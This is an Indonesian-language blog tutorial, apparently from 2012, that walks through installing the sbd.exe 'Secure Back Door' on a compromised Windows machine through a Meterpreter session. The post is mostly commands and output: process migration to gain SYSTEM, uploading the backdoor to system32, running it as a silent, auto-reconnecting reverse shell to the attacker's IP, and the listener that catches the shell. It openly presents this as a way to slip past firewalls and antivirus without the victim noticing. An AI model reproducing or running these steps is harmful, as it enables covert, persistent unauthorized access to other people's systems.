Searching...
January 8, 2012

Using Secure Back Door

Kesempatan memang tidak bisa ditebak kapan datangnya. Mendapatkan sesi meterpreter nyaris mustahil mengingat banyaknya orang yang menggunakan Windows 7. Untuk itu, kita membutuhkan back door, agar kita tidak perlu repot-repot masuk ke dalam system.

Back door secara harfiah berarti pintu belakang. Jika anda kesulitan masuk lewat pintu depan, maka sangatlah penting untuk membuat pintu belakang ketika anda mendapatkan system. Anda tidak perlu babak belur lagi dalam menghadapi firewall, atau antivirus. Anda hanya mengakses pintu belakang, dan anda sudah dapat mengakses system seketika itu juga.

Kali ini saya akan membahas mengenai Secure Back Door. Secure back door sama seperti trojan, korban tidak mengetahui kapan attacker masuk ke dalam system nya. Untuk itu, sudah banyak antivirus yang mengincar secure back door untuk dihabisi secara tidak manusiawi. [???]

Langsung saja kita ke tutorial.

Preparation:
[*] sbd.exe dapat di temukan di dalam backtrack 5 atau download di sini.
[*] metaploit dapat ditemukan di backtrack 5, atau download di sini

Briefing:
[*] Kita akan menggunakan metaspoit interpreter untuk mengupload secure back door
[*] Setelah diupload, kita jalankan secure back door untuk melakukan koneksi terhadap attacker
[*] Kita akan melakukan listening sesuai dengan settingan secure back door
[*] Beberapa saat setelah secure back door melakukan koneksi terhadap attacker, kita akan mendapatkan system korban

Note:
Saya tidak akan menjelaskan bagaimana saya mendapatkan sesi meterpreter, di sini saya berfokus untuk menjelaskan penggunaan secure backdoor. Mendapatkan sesi meterpreter adalah tugas anda.

Walkthtrough:

1. Gaining Access

Setelah mendapatkan sesi meterpreter, saya akan melakukan aksi migrasi ke process yang berasal dari directory C:/WINDOWS/system32. Dalam kasus ini saya melakukan migrasi ke proses 848 milik svchost.exe.

Command :
msf  exploit(handler) > exploit 
[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 172.16.230.128[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1034) at 2012-01-08 17:23:35 +0700
meterpreter >



Sebelum melakukan process migrate, kita akan menggunakan perintah ps untuk mengecek process list korban

Command :
meterpreter > ps
Process list============
 PID   Name               Arch  Session  User                 Path ---   ----               ----  -------  ----                 ---- 0     [System Process]                                        1028  svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe 1056  wmiprvse.exe       x86   0                             C:\WINDOWS\system32\wbem\wmiprvse.exe 1088  svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe 1140  svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe 1392  TPAutoConnSvc.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe 1448  explorer.exe       x86   0        VICTIM\User          C:\WINDOWS\Explorer.EXE 1532  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe 1580  alg.exe            x86   0                             C:\WINDOWS\System32\alg.exe 1728  VMwareTray.exe     x86   0        VICTIM\User          C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1736  vmtoolsd.exe       x86   0        VICTIM\User          C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1892  AntDS.exe          x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\BigAntSoft\AntServer\AntDS.exe 1908  AntServer.exe      x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\BigAntSoft\AntServer\AntServer.exe 1920  AvServer.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\BigAntSoft\AntServer\AvServer.exe 2060  wscntfy.exe        x86   0        VICTIM\User          C:\WINDOWS\system32\wscntfy.exe 228   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 2580  TPAutoConnect.exe  x86   0        VICTIM\User          C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe 2636  MP3Studio.exe      x86   0        VICTIM\User          C:\mp3-millennium\MP3Studio.exe 380   smss.exe           x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe 4     System             x86   0                              592   csrss.exe          x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe 616   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe 668   services.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe 680   lsass.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe 832   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe 848   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe 928   svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe


Bingo. Kita mendapatkan process svchost dengan process ID 848. Lakukan perintah migrate.

Command :
meterpreter > migrate 848[*] Migrating to 848...[*] Migration completed successfully.

Ok. Kita berhasil berpindah ke process svchost. Migrate tidak hanya berfungsi untuk merubah process work directory, melainkan juga untuk merubah User ID. Untuk mengecek process work directoty, gunakan perintah pwd.

Command :
meterpreter > pwdC:\WINDOWS\system32

Untuk mengecek User ID, gunakan perintah getuid.

Command :
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM



Ok. Kita sudah berada di puncak rantai process.


2. Upload Secure Back Door

Untuk mengupload Secure Back Door, kita bisa gunakan perintah upload dalam metasploit interpreter. Lalu dimana Secure Back Door kita? Dalam backtrack 5, Secure Back Door, bersemayam di dalam directory /pentest/windows-binaries/tools dan Secure Back Door memiliki nama sbd.exe. Kita akan mengupload ini ke dalam system korban. Di sini, saya akan mengupload Secure Back Door ke directoy pusat, yaitu C:/WINDOWS/system32.

Command :
meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C:/WINDOWS/system32[*] uploading  : /pentest/windows-binaries/tools/sbd.exe -> C:/WINDOWS/system32[*] uploaded   : /pentest/windows-binaries/tools/sbd.exe -> C:/WINDOWS/system32\sbd.exe



Berhasil. Kita sudah menempatkan Secure Back Door di dalam system korban. Langkah selanjutnya adalah mengeksekusi Secure Back Door.


3. Mengeksekusi Secure Back Door

Untuk mengeksekusi Secure Back Door, kita dapat menggunakan dua cara:

[*] Menggunakan metasploit interpreter dengan perintah execute
[*] Menggunakan Command Promtp untuk mengeksekusi Secure Back Door

Kali ini saya menggunakan Command Prompt untuk mengeksekusi Secure Back Door. Hal yang perlu diperhatikan adalah process work directory dari command prompt. Mengingat saya sudah mengupload Secure Back Door ke direktori C:/WINDOWS/system32, maka command prompt kita harus berada di C:/WINDOWS/system32. Bagaimana cara mengetahuinya? Kita bisa melihat dari kepala Command Prompt.

C:/>

Diatas menunjukan bahwa command prompt berada dalam direktory C:

C:\WINDOWS\system32>

Sementara di atas menunjukan bahwa Command Prompt berada dalam direktori C:\WINDOWS\system32

Untuk menggunakan command prompt, kita akan menggunakan metasploit interpreter dengan perintah shell.

Command :
meterpreter > shell Process 3524 created.Channel 3 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Ok. Sekarang saya telah mengendalikan command prompt. Langkah selanjutnya adalah mengeksekusi Secure Back Door. Masih ingatkah bahwa secure back door memiliki nama sbd.exe? Bagus... Mengeksekusi sbd.exe sangatlah mudah. Berikut perintahnya:

Command :
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>sbd.exe -q -r 5 -k secret -e cmd -p 1809 172.16.230.1



Penggunaan :
    -l          Daftar koneksi yang datang (List)
    -p          Memilih port yang digunakan untuk melakukan koneksi, atau
                listener (port)
    -a          memilih sebuah alamat untuk dituju, atau didengar
    -e          memilih program yang akan dieksekusi setelah terjadi koneksi
                (contoh. -e cmd.exe or -e bash)
    -r          menghubungi kembali tujuan.
                (contoh. -r 5 berarti menghubungi kembali setiap 5 detik)
    -c          mengatur enkripsi, anda bisa menggunakan enkripsi
                AES-CBC-128 + HMAC-SHA1 cukup dengan
                mengatur nilai c menjadi on. Jika tidak ingin menggunakan
                enkripsi, maka atur nilai c menjadi off.
    -k          ini adalah parameter yang harus disisipkan. Karena butuh kata
                kunci untuk melengkapi sebuah koneksi.
    -q          mode qiuet (diam)
    -v          menonaktifkan mode quiet (verbose)
    -m          menggunakan perintah monitoring koneksi
    -H          memberi tanda highlight pada data atau koneksi yang masuk.
    -V          mengecek versi sbd
    -w          mengatur batas waktu timeout.
    -D on|off   menjalankan program dibalik layar (background process)

Dalam perintah di atas, saya akan menjelaskan pengaturan Secure Back Door saya
1. -q : Saya menggunakan mode diam, seperti moto backtrack, the quieter you are, the more you are able to hear.
2. -r : saya melakukan respawn atau reconnect setiap 5 detik
3. -k : kata kunci saya adalah secret
4. -e : setelah terjadi koneksi, saya akan mengeksekusi command prompt (cmd)
5. -p : saya akan mencoba untuk menghubungi port 1809 (sebenarnya ini tanggal jadian saya)
6. IP di belakang adalah IP address saya. Saya akan membuat korban mengakses IP address saya.

Ok, setelah semua pengaturan telah selesai, sekarang kita akan mendengarkan ada apa di port 1809.


4. The Quieter You Are, The More You Are Able To Hear!

Untuk mendengarkan apa yang terjadi di port 1809, kita akan menggunakan perintah sbd di dalam terminal. Dalam kasus saya, saya telah mengatur Secure Back Door agar menghubungi saya di port 1809. Maka perintahnya adalah:

Command :
root@revolution:~# sbd -l -k secret -p 1809



Seperti di dalam pengaturan Secure Back Door saya. Saya menggunakan kata kunci secret, dan melakukan listening (-l) pada port 1809 (-p).

Setelah menunggu sekitar 5 detik....

Command :
root@revolution:~# sbd -l -k secret -p 1809Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Excellent as usual.

created by : red-dragon

0 comment:

Post a Comment

 
Back to top!